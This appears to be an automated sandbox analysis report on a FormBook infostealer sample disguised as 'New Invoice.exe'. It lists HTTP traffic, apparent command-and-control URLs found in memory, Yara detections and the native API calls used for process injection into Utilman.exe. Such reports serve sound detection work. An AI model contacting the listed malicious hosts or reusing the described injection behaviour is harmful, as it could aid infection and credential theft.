Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 21 Jan 2025 14:08:46 GMTContent-Type: text/htmlContent-Length: 150Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 21 Jan 2025 14:08:49 GMTContent-Type: text/htmlContent-Length: 150Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 21 Jan 2025 14:08:51 GMTContent-Type: text/htmlContent-Length: 150Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 21 Jan 2025 14:08:54 GMTContent-Type: text/htmlContent-Length: 150Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>

Source: Utilman.exe, 00000006.00000002.4485474157.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484898103.00000000036B8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://jeanandolive.net/gi1p/?Dv=29wY8b33u
Source: New Invoice.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484490744.0000000002B4B000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.goodnewsedutech.net
Source: hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484490744.0000000002B4B000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.goodnewsedutech.net/1wzu/
Source: Utilman.exe, 00000006.00000002.4487457783.0000000008598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Utilman.exe, 00000006.00000002.4487457783.0000000008598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Utilman.exe, 00000006.00000002.4487457783.0000000008598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Utilman.exe, 00000006.00000002.4487457783.0000000008598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Utilman.exe, 00000006.00000002.4485474157.0000000006834000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000006.00000002.4487284304.00000000081A0000.00000004.00000800.00020000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484898103.0000000004024000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://counter.yadro.ru/hit;85data?t52.6;r
Source: Utilman.exe, 00000006.00000002.4487457783.0000000008598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Utilman.exe, 00000006.00000002.4487457783.0000000008598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Utilman.exe, 00000006.00000002.4487457783.0000000008598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Utilman.exe, 00000006.00000002.4483639342.00000000033CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: Utilman.exe, 00000006.00000002.4483639342.00000000033CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: Utilman.exe, 00000006.00000002.4483639342.00000000033CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: Utilman.exe, 00000006.00000002.4483639342.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033v
Source: Utilman.exe, 00000006.00000002.4483639342.00000000033CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: Utilman.exe, 00000006.00000002.4483639342.00000000033CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: Utilman.exe, 00000006.00000003.2420534096.00000000084DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: Utilman.exe, 00000006.00000002.4487284304.00000000081A0000.00000004.00000800.00020000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484898103.0000000004024000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css
Source: Utilman.exe, 00000006.00000002.4487457783.0000000008598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Utilman.exe, 00000006.00000002.4485474157.000000000637E000.00000004.10000000.00040000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484898103.0000000003B6E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hostgator.com.br
Source: Utilman.exe, 00000006.00000002.4485474157.0000000006834000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000006.00000002.4487284304.00000000081A0000.00000004.00000800.00020000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4484898103.0000000004024000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.liveinternet.ru/click;85data

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.New Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.New Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4484490744.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4483401179.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2285266687.0000000005510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2232530046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4484804809.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4484749784.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4484533261.0000000004B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2235644456.00000000035C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: New Invoice.exe

Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0042C8D3 NtClose,	4_2_0042C8D3
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2B60 NtClose,LdrInitializeThunk,	4_2_013E2B60
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_013E2DF0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_013E2C70
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E35C0 NtCreateMutant,LdrInitializeThunk,	4_2_013E35C0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E4340 NtSetContextThread,	4_2_013E4340
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E4650 NtSuspendThread,	4_2_013E4650
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2BA0 NtEnumerateValueKey,	4_2_013E2BA0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2B80 NtQueryInformationFile,	4_2_013E2B80
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2BF0 NtAllocateVirtualMemory,	4_2_013E2BF0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2BE0 NtQueryValueKey,	4_2_013E2BE0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2AB0 NtWaitForSingleObject,	4_2_013E2AB0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2AF0 NtWriteFile,	4_2_013E2AF0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2AD0 NtReadFile,	4_2_013E2AD0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2D30 NtUnmapViewOfSection,	4_2_013E2D30
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2D10 NtMapViewOfSection,	4_2_013E2D10
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2D00 NtSetInformationFile,	4_2_013E2D00
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2DB0 NtEnumerateKey,	4_2_013E2DB0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2DD0 NtDelayExecution,	4_2_013E2DD0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2C00 NtQueryInformationProcess,	4_2_013E2C00
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2C60 NtCreateKey,	4_2_013E2C60
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2CA0 NtQueryInformationToken,	4_2_013E2CA0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2CF0 NtOpenProcess,	4_2_013E2CF0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2CC0 NtQueryVirtualMemory,	4_2_013E2CC0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2F30 NtCreateSection,	4_2_013E2F30
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2F60 NtCreateProcessEx,	4_2_013E2F60
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2FB0 NtResumeThread,	4_2_013E2FB0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2FA0 NtQuerySection,	4_2_013E2FA0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2F90 NtProtectVirtualMemory,	4_2_013E2F90
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2FE0 NtCreateFile,	4_2_013E2FE0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2E30 NtWriteVirtualMemory,	4_2_013E2E30
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2EA0 NtAdjustPrivilegesToken,	4_2_013E2EA0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2E80 NtReadVirtualMemory,	4_2_013E2E80
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E2EE0 NtQueueApcThread,	4_2_013E2EE0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E3010 NtOpenDirectoryObject,	4_2_013E3010
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E3090 NtSetValueKey,	4_2_013E3090
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E39B0 NtGetContextThread,	4_2_013E39B0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E3D10 NtOpenProcessToken,	4_2_013E3D10
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E3D70 NtOpenThread,	4_2_013E3D70
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05114650 NtSuspendThread,LdrInitializeThunk,	6_2_05114650
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05114340 NtSetContextThread,LdrInitializeThunk,	6_2_05114340
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_05112D10
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_05112D30
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112DD0 NtDelayExecution,LdrInitializeThunk,	6_2_05112DD0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_05112DF0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_05112C70
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112C60 NtCreateKey,LdrInitializeThunk,	6_2_05112C60
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_05112CA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112F30 NtCreateSection,LdrInitializeThunk,	6_2_05112F30
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112FB0 NtResumeThread,LdrInitializeThunk,	6_2_05112FB0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112FE0 NtCreateFile,LdrInitializeThunk,	6_2_05112FE0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_05112E80
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_05112EE0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112B60 NtClose,LdrInitializeThunk,	6_2_05112B60
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_05112BA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_05112BF0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_05112BE0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112AD0 NtReadFile,LdrInitializeThunk,	6_2_05112AD0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112AF0 NtWriteFile,LdrInitializeThunk,	6_2_05112AF0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051135C0 NtCreateMutant,LdrInitializeThunk,	6_2_051135C0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051139B0 NtGetContextThread,LdrInitializeThunk,	6_2_051139B0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112D00 NtSetInformationFile,	6_2_05112D00
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112DB0 NtEnumerateKey,	6_2_05112DB0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112C00 NtQueryInformationProcess,	6_2_05112C00
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112CC0 NtQueryVirtualMemory,	6_2_05112CC0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112CF0 NtOpenProcess,	6_2_05112CF0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112F60 NtCreateProcessEx,	6_2_05112F60
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112F90 NtProtectVirtualMemory,	6_2_05112F90
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112FA0 NtQuerySection,	6_2_05112FA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112E30 NtWriteVirtualMemory,	6_2_05112E30
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112EA0 NtAdjustPrivilegesToken,	6_2_05112EA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112B80 NtQueryInformationFile,	6_2_05112B80
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05112AB0 NtWaitForSingleObject,	6_2_05112AB0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05113010 NtOpenDirectoryObject,	6_2_05113010
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05113090 NtSetValueKey,	6_2_05113090
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05113D10 NtOpenProcessToken,	6_2_05113D10
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05113D70 NtOpenThread,	6_2_05113D70
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FD9350 NtReadFile,	6_2_02FD9350
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FD91E0 NtCreateFile,	6_2_02FD91E0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FD9650 NtAllocateVirtualMemory,	6_2_02FD9650
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FD94E0 NtClose,	6_2_02FD94E0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FD9440 NtDeleteFile,	6_2_02FD9440

Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_050B4218	0_2_050B4218
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_050BE04C	0_2_050BE04C
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_050B7089	0_2_050B7089
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07063248	0_2_07063248
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07073718	0_2_07073718
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07075630	0_2_07075630
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07070040	0_2_07070040
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07074D80	0_2_07074D80
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07073CB8	0_2_07073CB8
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_0707370A	0_2_0707370A
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_0707E740	0_2_0707E740
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_0707E750	0_2_0707E750
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_0707C6D8	0_2_0707C6D8
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07073510	0_2_07073510
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07073520	0_2_07073520
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_070745B0	0_2_070745B0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07074468	0_2_07074468
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07073298	0_2_07073298
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_070732A8	0_2_070732A8
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_0707F2B0	0_2_0707F2B0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07074100	0_2_07074100
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07070006	0_2_07070006
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07074010	0_2_07074010
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_0707307A	0_2_0707307A
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07073088	0_2_07073088
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_0707CF48	0_2_0707CF48
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07071E38	0_2_07071E38
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07071E48	0_2_07071E48
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07074D70	0_2_07074D70
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07075C00	0_2_07075C00
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07075C10	0_2_07075C10
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07073CAA	0_2_07073CAA
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07072CF0	0_2_07072CF0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_0707CB00	0_2_0707CB00
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_0707CB10	0_2_0707CB10
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07073950	0_2_07073950
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_07073960	0_2_07073960
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_0707296A	0_2_0707296A
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 0_2_070729F8	0_2_070729F8
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_004188A3	4_2_004188A3
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00401924	4_2_00401924
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00402810	4_2_00402810
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_004100E3	4_2_004100E3
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00403170	4_2_00403170
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00401200	4_2_00401200
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00416AAE	4_2_00416AAE
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00416AB3	4_2_00416AB3
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00410303	4_2_00410303
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0040E303	4_2_0040E303
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0040E451	4_2_0040E451
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0040E453	4_2_0040E453
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0040256A	4_2_0040256A
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_00402570	4_2_00402570
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0042EED3	4_2_0042EED3
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01438158	4_2_01438158
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013A0100	4_2_013A0100
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0144A118	4_2_0144A118
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_014681CC	4_2_014681CC
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_014641A2	4_2_014641A2
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_014701AA	4_2_014701AA
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01442000	4_2_01442000
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146A352	4_2_0146A352
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_014703E6	4_2_014703E6
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013BE3F0	4_2_013BE3F0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01450274	4_2_01450274
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_014302C0	4_2_014302C0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B0535	4_2_013B0535
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01470591	4_2_01470591
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01462446	4_2_01462446
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01454420	4_2_01454420
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0145E4F6	4_2_0145E4F6
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B0770	4_2_013B0770
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013D4750	4_2_013D4750
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013AC7C0	4_2_013AC7C0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013CC6E0	4_2_013CC6E0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013C6962	4_2_013C6962
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B29A0	4_2_013B29A0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0147A9A6	4_2_0147A9A6
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B2840	4_2_013B2840
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013BA840	4_2_013BA840
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013968B8	4_2_013968B8
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013DE8F0	4_2_013DE8F0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146AB40	4_2_0146AB40
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01466BD7	4_2_01466BD7
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013AEA80	4_2_013AEA80
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013BAD00	4_2_013BAD00
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0144CD1F	4_2_0144CD1F
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013C8DBF	4_2_013C8DBF
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013AADE0	4_2_013AADE0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B0C00	4_2_013B0C00
